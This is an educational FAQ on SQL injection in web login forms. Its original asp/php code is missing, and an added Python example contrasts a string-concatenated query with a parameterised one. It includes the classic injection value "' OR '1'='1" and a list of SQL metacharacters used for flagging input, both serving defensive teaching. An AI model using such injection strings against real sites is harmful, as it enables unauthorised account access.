Problems with user input in scripting languages using databases (SQL statements)

A number of web sites are hacked as a result of something called "user input validation/filtering" - or, to be more precise - the lack of it.
This topic should be a guide to web programmers (any language - php, asp, perl etc - but we will focus on php/asp examples) on how to safely deal with user input. I will also be talking about why this is important, and giving examples of how sites that don't successfully filter user input can have accounts on the server compromised, or worse. I am not going to be explaining the SQL/php/asp code in much detail...so a basic knowledge of these languages will help you understand this topic a bit better ;)

Firstly, what is the root cause of the problem? Is it the php/asp programming languages? Is it the database backend (whether it be mysql, sql server, access db, etc)? No...the problem lies with the programmer of the site, and the users visiting the site. The problem is that when you have a form on your web site, whether it be a login form (asking for a username/password) or a comments form, or anything - you are asking the user to send information into scripts on your web site. Although 18/20 users might use the form in the intended way - there will always be 1 or 2 malicious users who will send your scripts data they didn't expect. The moral of the story is - you simply can't trust unchecked user input. However, let's not take my word for it...let's look at a simple login form in asp, which takes a username/password and validates them against a table called "users" in an access database (my comments are in green in the asp/php code):

Html Code:

    Username:
    Password:

ASP Code for "logmein.asp" (where the html form sends its data):

And for reference...the PHP equivalent code for "logmein.asp" (where the html form sends its data):

    Unable to connect to DB server at this time
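Since the asp/php listings did not survive on this page, here is an added Python example (not the FAQ's own code) of the same login scenario: a username/password checked against a "users" table, first with the SQL text built by string concatenation, then with a parameterised query. The in-memory SQLite table, the user rows and the function names are constructed for the example.

```python
"""Login check against a "users" table: string-built SQL vs. parameterised query.

Added example, not the FAQ's own asp/php code.  The database is an in-memory
SQLite table standing in for the Access database in the text; rows are made up.
"""
import sqlite3


def make_db():
    """Constructed users table with two sample accounts."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("wang", "s3cret"), ("guest", "guest")])
    return db


def login_unsafe(db, username, password):
    """The classic mistake: form values are pasted into the SQL text, so a
    quote character in either field changes what the statement means.
    Returns the matched username, or None."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Fixed version: placeholders keep the form values as data, never as SQL,
    so whatever the user typed is compared literally against the columns."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def looks_like_sql_metachars(value):
    """Input check a form handler can apply before querying, in the spirit of
    the FAQ's filtering advice: flags quotes, comment markers and separators.
    Parameterised queries remain the real fix; this only adds a warning."""
    return any(tok in value for tok in ("'", "--", ";", "/*"))


if __name__ == "__main__":
    db = make_db()
    print("normal login:", login_safe(db, "wang", "s3cret"))       # wang
    print("wrong password:", login_safe(db, "wang", "nope"))       # None
    # Constructed malicious input: a quote followed by an always-true clause.
    evil = "' OR '1'='1"
    print("unsafe handler, bad input:", login_unsafe(db, "nobody", evil))
    print("safe handler, same input:  ", login_safe(db, "nobody", evil))   # None
    print("flagged by input check:", looks_like_sql_metachars(evil))       # True
```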

 